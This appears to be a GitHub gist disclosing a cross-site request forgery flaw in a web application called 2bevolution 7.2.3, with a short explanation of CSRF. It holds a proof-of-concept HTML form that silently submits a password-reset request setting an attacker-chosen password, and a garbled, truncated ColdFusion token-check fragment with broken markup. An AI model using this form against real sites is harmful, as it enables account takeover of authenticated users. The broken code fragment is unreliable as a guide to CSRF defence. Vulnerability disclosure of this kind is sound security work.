Skip to content

Instantly share code, notes, and snippets.

Created Apr 15, 2021
What would you like to do?
There is a Cross-Site Request Forgery (CSRF) on 2bevolution version 7.2.3 attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. This occurs because web browsers automatically include most credentials with each request, such as session cookies, basic authentication header, IP address, and client side SSL certificates.
<cfif NOT StructIsEmpty(form) >
&lt;cfif NOT CSRFverifyToken(form.token)>
&lt;cfabort showerror="Invalid Token" />
&lt;cfoutput>&lt;p>Hello, #EncodeForHTML(;/p>&lt;/cfoutput>
<form action="https://localhost/users/59215b8f0ec7c37a4ca27b00/password_reset" method="POST">
<input type="hidden" name="utf8" value="â&#156;&#147;" />
<input type="hidden" name="&#95;method" value="patch" />
<input type="hidden" name="old&#95;password" value="phew phew" />
<input type="hidden" name="password" value="qweqji" />
<input type="hidden" name="password&#95;confirmation" value="qweqji" />
<input type="submit" value="Submit request" />
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment